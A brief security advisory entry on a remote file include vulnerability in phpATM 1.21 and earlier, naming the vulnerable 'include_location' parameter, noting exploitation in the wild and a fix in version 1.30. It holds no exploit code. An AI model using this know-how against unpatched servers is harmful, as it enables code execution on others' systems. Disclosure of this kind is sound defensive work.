(7) HIGH: phpATM Remote File Include Vulnerability
phpATM version 1.21 and earlier
Description: phpATM software provides file upload and download functions
for web severs. This software contains a file include vulnerability. An
attacker can pass a PHP file location to the "include_location"
parameter, and execute arbitrary PHP code on the webserver running
phpATM. This flaw has reportedly been exploited in the wild.
Status: phpATM has released version 1.30 that fixes the issue.
Council Site Actions: The affected software and/or configuration is not
in production or widespread use, or is not officially supported at any
of the council sites. They reported that no action was necessary.
Posting by Ingvar